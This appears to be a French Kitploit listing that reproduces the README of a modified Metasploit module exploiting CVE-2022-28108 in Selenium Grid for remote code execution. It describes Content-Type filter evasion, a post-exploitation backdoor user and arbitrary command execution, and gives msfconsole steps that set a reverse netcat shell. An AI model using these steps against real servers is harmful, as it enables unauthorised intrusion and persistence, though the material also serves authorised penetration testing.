Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-28108 — Module Metasploit exploitant CVE-2022-28108 dans Selenium Grid pour l'exécution de code à distance, avec évasion de type de contenu et capacités de post-exploitation. | Kitploit
Outils/GitHubGitHub/zeroethical/cve-2022-28108
Frameworks d'ExploitationAnalyse des VulnérabilitésExploitationExploitation d'Applications WebPost-ExploitationTests d'IntrusionRed TeamingDéveloppement de Charges Utiles
GitHubzeroethical/cve-2022-28108

CVE-2022-28108

Module Metasploit exploitant CVE-2022-28108 dans Selenium Grid pour l'exécution de code à distance, avec évasion de type de contenu et capacités de post-exploitation.

11il y a 1 anPas encore vérifié
Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Selenium Chrome RCE Exploit (Étendu)

Ce dépôt contient une version modifiée d'un module Metasploit qui exploite une vulnérabilité d'exécution de code à distance dans les anciennes versions de Selenium Server (Grid).

Veuillez lire attentivement ce README avant d'utiliser ce code.


Remerciements au code original :

Ce module est basé sur l'excellent travail des auteurs originaux du module Metasploit pour CVE-2022-28108. La fonctionnalité principale d'exploitation de la vulnérabilité du serveur Selenium reste largement basée sur leur implémentation. Nous reconnaissons et apprécions leur contribution à la communauté de la sécurité.

  • Module Metasploit original : Vous pouvez trouver le module original dans le Framework Metasploit.
  • Auteurs originaux : Les auteurs originaux sont crédités dans le module lui-même (généralement dans la section 'Author'). Veuillez vous référer au module original pour leurs noms spécifiques.

Vulnérabilité exploitée :

Ce module cible CVE-2022-28108, une vulnérabilité de Cross-Site Request Forgery (CSRF) dans Selenium Server (Grid) versions antérieures à 4.0.0-alpha-7. Cette vulnérabilité survient car le serveur autorise des types de contenu non JSON (comme text/plain, application/x-www-form-urlencoded et multipart/form-data) pour certaines requêtes. Un attaquant peut en tirer parti pour envoyer des requêtes malveillantes, conduisant à une exécution de code à distance (RCE) sur le serveur.

Fonctionnement du code original :

Le module Metasploit original exploite cette vulnérabilité en envoyant une requête POST fabriquée vers le point de terminaison /wd/hub/session du serveur Selenium vulnérable. Cette requête utilise un Content-Type non JSON (spécifiquement text/plain) et inclut des configurations malveillantes dans les goog:chromeOptions des capacités du navigateur souhaitées. Cela permet à un attaquant de spécifier un binaire arbitraire (comme /usr/bin/python3) et des arguments à exécuter sur le serveur lorsqu'une nouvelle session de navigateur est initiée.

Modifications et améliorations dans cette version :

Ce dépôt contient une version modifiée du module Metasploit original. Les principales modifications incluent :

  • Évitement du Content-Type : Le module modifié tente d'exploiter la vulnérabilité en envoyant la requête malveillante avec plusieurs en-têtes Content-Type différents. Cela inclut text/plain, application/x-www-form-urlencoded et multipart/form-data. Ceci est fait pour potentiellement contourner les mécanismes de filtrage ou de détection de base qui pourraient rechercher un Content-Type spécifique.
  • Fonction execute_post_exploitation : Une nouvelle fonction execute_post_exploitation(session_response) a été ajoutée. Cette fonction est appelée après une exploitation réussie et vise à effectuer des tâches de post-exploitation de base. Dans l'implémentation actuelle, elle inclut :
    • Tentative d'ajout d'un utilisateur backdoor au système.
    • Collecte d'informations système de base (nom d'utilisateur, ID, version du noyau).
  • Fonction execute_command_on_target : Une autre nouvelle fonction execute_command_on_target(command) a été ajoutée. Cette fonction permet l'exécution de commandes arbitraires sur le système cible après une exploitation réussie. Elle est utilisée dans la fonction execute_post_exploitation et peut être étendue pour d'autres activités de post-exploitation.

Principales différences soulignées :

La différence fondamentale réside dans la méthode exploit et l'ajout des deux nouvelles fonctions.

  • Méthode exploit originale : Se concentrait sur l'envoi d'une seule requête avec Content-Type: text/plain.
  • Méthode exploit modifiée : Parcourt différentes valeurs de Content-Type, en tentant l'exploitation avec chacune. En cas d'exploitation réussie, elle appelle la fonction execute_post_exploitation.
  • Nouvelles fonctions : Les fonctions execute_post_exploitation et execute_command_on_target sont des ajouts entièrement nouveaux dans cette version modifiée, offrant des capacités de post-exploitation étendues.

Comment utiliser le module modifié :

  1. Assurez-vous d'avoir le Framework Metasploit installé.
  2. Enregistrez le code modifié : Enregistrez le code Ruby fourni dans un fichier .rb (par exemple, selenium_rce_extended.rb).
  3. Placez le module dans le répertoire des modules Metasploit : Copiez le fichier enregistré dans le répertoire approprié des modules Metasploit. Celui-ci se trouve généralement dans /usr/share/metasploit-framework/modules/exploits/ ou ~/.msf4/modules/exploits/. Référez-vous à votre installation Metasploit pour l'emplacement exact.
  4. Démarrez la console Metasploit : Ouvrez un terminal et exécutez msfconsole.
  5. Chargez le module : Dans la console Metasploit, utilisez la commande use exploit/selenium_rce_extended (ou le chemin où vous avez enregistré le fichier si vous l'avez placé dans un sous-répertoire).
  6. Configurez la cible : Définissez l'adresse IP et le port du serveur Selenium vulnérable :
    msf6 exploit(selenium_rce_extended) > set RHOSTS <target_ip>
    msf6 exploit(selenium_rce_extended) > set RPORT <target_port>
    
    (Le port par défaut pour Selenium Grid est souvent 4444).
  7. Définissez la charge utile : Choisissez une charge utile à exécuter sur le système cible. Par exemple, pour obtenir un shell inversé :
    msf6 exploit(selenium_rce_extended) > set PAYLOAD cmd/unix/reverse_netcat
    msf6 exploit(selenium_rce_extended) > set LHOST <your_ip>
    msf6 exploit(selenium_rce_extended) > set LPORT <your_port>
    
  8. Exécutez l'exploit : Lancez le module avec la commande exploit.

Considérations importantes (Avertissement) :

  • Utilisez ce code de manière responsable et éthique. Ce module est fourni à des fins éducatives et pour que les professionnels de la sécurité puissent tester et évaluer la sécurité de leurs systèmes.
  • Assurez-vous d'avoir une autorisation explicite pour tester le système cible. L'utilisation non autorisée de ce code est illégale et contraire à l'éthique.
  • Comprenez les risques impliqués. L'exploitation de vulnérabilités peut avoir des conséquences imprévues et peut déstabiliser les systèmes cibles.
  • Testez dans des environnements isolés et contrôlés. Effectuez toujours les tests dans des environnements où vous avez un contrôle total et pouvez atténuer tout dommage potentiel.
  • Les fonctions de post-exploitation sont des exemples de base. Vous devrez peut-être les modifier ou les étendre en fonction de vos besoins spécifiques et de l'environnement cible.

Clause de non-responsabilité :

Le(s) auteur(s) de ce code modifié ne sont pas responsables de toute utilisation abusive ou de tout dommage causé par l'utilisation de ce module. En utilisant ce code, vous acceptez d'assumer l'entière responsabilité de vos actions.

Licence :

Ce code modifié est probablement couvert par la même licence que le Framework Metasploit original (généralement la licence MSF). Veuillez vous référer à la licence originale du Framework Metasploit pour plus de détails.

Contributions :

Les contributions et améliorations de ce module sont les bienvenues. N'hésitez pas à soumettre des pull requests avec des corrections de bugs, des améliorations ou de nouvelles fonctionnalités.

Remerciements :

Nous réitérons notre gratitude envers les auteurs originaux du module Metasploit pour CVE-2022-28108. Leur travail constitue la base de ce module modifié.

Télécharger l’outil